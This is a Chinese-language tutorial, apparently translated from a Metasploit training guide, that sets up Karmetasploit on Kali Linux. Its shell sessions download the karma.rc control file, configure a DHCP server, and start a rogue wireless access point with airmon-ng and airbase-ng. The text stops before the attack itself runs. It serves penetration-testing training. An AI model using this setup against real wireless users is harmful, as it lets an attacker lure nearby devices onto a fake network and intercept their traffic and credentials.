获得Karmetasploit并进行Kali Linux Rolling 需要一些设置。第一步是获取Karmetasploit的运行控制文件:
root@kali:~# wget https://www.offensive-security.com/wp-content/uploads/2015/04/karma.rc_.txt
--2015-04-03 16:17:27-- https://www.offensive-security.com/downloads/karma.rc
Resolving www.offensive-security.com (www.offensive-security.com)... 198.50.176.211
Connecting to www.offensive-security.com (www.offensive-security.com)|198.50.176.211|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1089 (1.1K) [text/plain]
Saving to: `karma.rc' 100%[======================================>] 1,089 --.-K/s in 0s
2015-04-03 16:17:28 (35.9 MB/s) - `karma.rc' saved [1089/1089]
root@kali:~#
获得了这个要求后,我们需要建立一些所需的基础设施。当客户端连接到我们运行的假AP时,他们将期待被分配一个IP地址。因此,我们需要放置一个DHCP服务器。让我们在Kali上安装一个DHCP服务器。
root@kali:~# apt update
...snip...
root@kali:~# apt -y install isc-dhcp-server
Reading package lists... Done
Building dependency tree
Reading state information... Done
...snip...
root@kali:~#
接下来,让我们配置我们的'dhcpd.conf'文件。我们将用以下输出替换配置文件:
root@kali:~# cat /etc/dhcp/dhcpd.conf
option domain-name-servers 10.0.0.1;
default-lease-time 60;
max-lease-time 72;
ddns-update-style none;
authoritative;
log-facility local7;
subnet 10.0.0.0 netmask 255.255.255.0 {
range 10.0.0.100 10.0.0.254;
option routers 10.0.0.1;
option domain-name-servers 10.0.0.1;
}
root@kali:~#
然后我们需要安装一些要求。
root@kali:~# apt -y install libsqlite3-dev
Reading package lists... Done
Building dependency tree
Reading state information... Done
...snip...
root@kali:~# gem install activerecord sqlite3
Fetching: activerecord-5.0.0.1.gem (100%)
Successfully installed activerecord-5.0.0.1
Parsing documentation for activerecord-5.0.0.1
Installing ri documentation for activerecord-5.0.0.1
Done installing documentation for activerecord after 7 seconds
Fetching: sqlite3-1.3.12.gem (100%)
Building native extensions. This could take a while...
Successfully installed sqlite3-1.3.12
Parsing documentation for sqlite3-1.3.12
Installing ri documentation for sqlite3-1.3.12
Done installing documentation for sqlite3 after 0 seconds
2 gems installed
root@kali:~#
现在我们准备好了。首先,我们需要找到我们的无线网卡,然后使用airmon-ng以监控模式启动我们的无线适配器。之后,我们利用airbase-ng启动一个新的无线网络。
root@kali:~# airmon-ng
PHY Interface Driver Chipset
phy0 wlan0 ath9k_htc Atheros Communications, Inc. AR9271 802.11n
root@kali:~# airmon-ng start wlan0
PHY Interface Driver Chipset
phy0 wlan0 ath9k_htc Atheros Communications, Inc. AR9271 802.11n
(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
(mac80211 station mode vif disabled for [phy0]wlan0)
Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
693 dhclient
934 wpa_supplicant
root@kali:~# airbase-ng -P -C 30 -e "U R PWND" -v wlan0mon
For information, no action required: Using gettimeofday() instead of /dev/rtc
22:52:25 Created tap interface at0
22:52:25 Trying to set MTU on at0 to 1500
22:52:25 Trying to set MTU on wlan0mon to 1800
22:52:25 Access Point with BSSID 00:C0:CA:82:D9:63 started.
Airbase-ng为我们创造了一个新的界面,“at0”。这是我们现在将使用的界面。我们现在将为自己分配一个IP地址。
root@kali:~# ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
root@kali:~#
在我们运行我们的DHCP服务器之前,我们需要创建一个租赁数据库,然后我们可以让它监听我们的新界面。
root@kali:~# touch /var/lib/dhcp/dhcpd.leases
root@kali:~# dhcpd -cf /etc/dhcp/dhcpd.conf at0
Internet Systems Consortium DHCP Server 4.3.3
Copyright 2004-2015 Internet Systems Consortium.
All rights reserved.
For info, please visit https://www.isc.org/software/dhcp/
Config file: /etc/dhcp/dhcpd.conf
Database file: /var/lib/dhcp/dhcpd.leases
PID file: /var/run/dhcpd.pid
Wrote 0 leases to leases file.
Listening on LPF/at0/00:c0:ca:82:d9:63/10.0.0.0/24
Sending on LPF/at0/00:c0:ca:82:d9:63/10.0.0.0/24
Sending on Socket/fallback/fallback-net
root@kali:~# ps aux | grep [d]hcpd
root 2373 0.0 0.4 28448 9532 ? Ss 13:45 0:00 dhcpd -cf /etc/dhcp/dhcpd.conf at0
root@kali:~#